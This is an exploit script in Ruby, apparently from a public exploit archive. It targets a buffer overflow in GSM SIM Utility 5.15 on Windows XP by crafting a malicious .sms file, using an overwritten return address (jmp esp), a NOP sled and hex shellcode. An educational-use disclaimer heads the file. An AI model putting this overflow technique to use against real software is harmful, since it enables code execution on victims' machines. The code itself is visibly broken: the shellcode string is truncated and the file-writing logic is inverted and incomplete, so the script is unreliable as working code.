# Exploit Title : GSM SIM Utility Local Exploit Direct Ret ver.
# Date: July 07, 2010
# Author: chap0 [www.seek-truth.net]
# Download Link : http://download.cnet.com/GSM-SIM-Utility/3000-18508_4-10396246.html?tag=mncol
# Version : 5.15
# OS: Windows XP SP3
# Greetz to : Corelan Security Team
# Advisory: http://www.corelan.be:8800/advisories.php?id=CORELAN-10-054
# The Crew: http://www.corelan.be:8800/index.php/security/corelan-team-members/
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
# Code :
puts '|------------------------------------------------------------------|'
puts '| __ __|'
puts '| _________________/ /___ _____ / /________ _____ ___|'
puts '|/ ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |'
puts '| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |'
puts '| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/|'
puts '||'
puts '| http://www.corelan.be:8800 |'
puts '||'
puts '|-------------------------------------------------[ EIP Hunters ]--|'
puts '[*] GSM SIM Utility Local Exploit Direct Ret ver. by chap0.'
puts '[*] Visit seek-truth.net'
crash = "A" * 810
eip = "01524000" #jmp esp
nop = "90" * 10
#message box
code ="d9eb9bd97424f431d2b27a31c964"+
payload = crash + eip + nop + code
sms = File.new( "directret.sms", "w" )
if sms
puts "Unable to create file."